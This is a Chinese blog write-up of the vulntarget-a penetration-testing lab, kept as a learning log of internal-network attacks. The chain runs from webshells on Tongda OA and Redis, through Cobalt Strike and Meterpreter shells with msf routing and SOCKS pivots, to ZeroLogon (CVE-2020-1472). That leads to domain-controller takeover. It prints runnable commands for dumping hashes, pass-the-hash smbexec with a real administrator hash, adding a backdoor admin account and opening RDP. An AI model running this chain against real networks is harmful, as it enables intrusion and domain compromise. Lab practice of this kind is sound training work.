Gridea

温故而知新

首页 归档 标签 关于

【靶场系列】vulntarget-a靶场练习

2022-04-07 6 min read # 靶场 # 内网渗透 # vulntarget

记录vultarget靶场系列,学习内网渗透相关知识

外网Win7

webshell

首先访问外网主机web服务,发现是通达OA,访问/inc/expired.php目录查看到是11.3版本,存在多个漏洞

image-20220314151941747

使用文件上传+文件包含漏洞getshell,并用蚁剑连接

image-20220314152026238
image-20220314152143814

命令行中发现直接拿到的是system权限

image-20220314152328993

查看网络,发现是双网卡,说明存在内网

image-20220314152614942

CS

CS上生成一个payload.c,使用掩日生成一个免杀马

image-20220314152856039

蚁剑中上传,并执行,CS上线

image-20220314153300463

上线后找到winlogon进程PID,并注入

image-20220314153434445

msf

kali下生成一个反向tcp马,kali监听对应端口,通过蚁剑上传并执行

image-20220314155739273

拿到目标的msf会话

image-20220314155903747

内网Win2016

redis

上传一个fscan,并扫描内网,得知内网还有一台Win2016主机,并且存在redis未授权漏洞(同时扫到win7存在ms17-010)

image-20220314160215392

使用CS开一个win7的socks端口,以便对内网机器进行访问

image-20220314160519330

使用redis-cli连接内网主机的redis服务,连接成功

image-20220314160553042

webshell

另外通过fscan发现80端口开放,访问发现确实存在web服务

image-20220314160657633

扫一下目录,发现phpinfo以及探针信息,通过任意一个拿到web服务绝对路径

image-20220314161030247
image-20220314161120328

再回到redis,写入一个webshell到web路径下

image-20220314162004525

蚁剑设置代理,连接内网的win2016

image-20220314162125354
image-20220314162112289

又发现是system权限,同时判断是不出网

image-20220314162212222
image-20220314162558891

cs

设置监听器,使用Win7做中转,实现CS上线

image-20220314163816437
image-20220314163834039

正常生成exe,使用蚁剑上传至win2016,执行即可上线

image-20220314164430028

hashdump抓取到一个密码

image-20220314164635039
image-20220314164641017

msf上线

kali生成一个tcp正向马,蚁剑上传

image-20220314171303253

在win7的msf会话中,添加路由表,以便访问内网

meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > use post/multi/manage/autoroute
msf6 post(multi/manage/autoroute) > set session 1
session => 1
msf6 post(multi/manage/autoroute) > run

[!] SESSION may not be compatible with this module.
[*] Running module against WIN7-PC
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.0.20.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 192.168.1.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 169.254.0.0/255.255.0.0 from Bluetooth vc6.
[*] Post module execution completed

查看路由表,确认10.0.20.0/24流量通过session1转发

meterpreter > run autoroute -p

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   10.0.20.0          255.255.255.0      Session 1
   169.254.0.0        255.255.0.0        Session 1
   192.168.1.0        255.255.255.0      Session 1

定位到域控主机ip及主机名

run post/windows/gather/enum_domain
image-20220314171747988

同样的,win2016会话也添加路由表

meterpreter > run post/multi/manage/autoroute

[!] SESSION may not be compatible with this module.
[*] Running module against WIN2016
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.0.10.0/255.255.255.0 from host's routing table.
meterpreter > run autoroute -p

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   10.0.10.0          255.255.255.0      Session 2
   10.0.20.0          255.255.255.0      Session 1
   169.254.0.0        255.255.0.0        Session 1
   192.168.1.0        255.255.255.0      Session 1

在本机1080端口开启一个socks代理,以便访问到域控

msf6 auxiliary(server/socks_proxy) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > options 

Module options (auxiliary/server/socks_proxy):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        Proxy password for SOCKS5 listener
   SRVHOST   0.0.0.0          yes       The address to listen on
   SRVPORT   1080             yes       The port to listen on
   USERNAME                   no        Proxy username for SOCKS5 listener
   VERSION   5                yes       The SOCKS version to use (Accepted: 4a, 5)


Auxiliary action:

   Name   Description
   ----   -----------
   Proxy  Run a SOCKS proxy server


msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 4.

[*] Starting the SOCKS proxy server

proxychains中添加代理

socks5 127.0.0.1 1080

域控

使用nmap扫描几个常见端口,测试代理是否正常

image-20220314175720917

CVE-2020-1472

检测发现存在CVE-2020-1472漏洞,POC地址:https://github.com/SecuraBV/CVE-2020-1472

跑了十几分钟终于跑完了。

proxychains ./zerologon_tester.py win2019 10.0.10.110
image-20220314183002921

使用exp,https://github.com/dirkjanm/CVE-2020-1472

置空DC密码

proxychains python3 cve-2020-1472-exploit.py win2019 10.0.10.110
image-20220314184220157

使用impacte:https://github.com/SecureAuthCorp/impacket/

获取域控hash

proxychains python3 examples/secretsdump.py vulntarget.com/win2019\[email protected]
image-20220314184850570

抓取到administrator的hash:

aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15

拿下域控

proxychains python3 examples/smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15 admi
[email protected]
image-20220314185138480

直接是system权限

image-20220314185354736

由于乱码问题,重新执行命令

proxychains python3 examples/smbexec.py -codec gbk -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15 [email protected]

创建一个用户,并添加到管理员用户组

C:\Windows\system32>net user xxh 123456Q@ /add
命令成功完成。


C:\Windows\system32>net localgroup administrators xxh /add
命令成功完成。

开启远程桌面服务

reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

使用rdesktop连接,报如下错误

image-20220314190512383

使用remmina进行连接

apt install remmina
proxychains remmina

输入ip+账户密码,成功登录

image-20220314190922354
Powered by Gridea RSS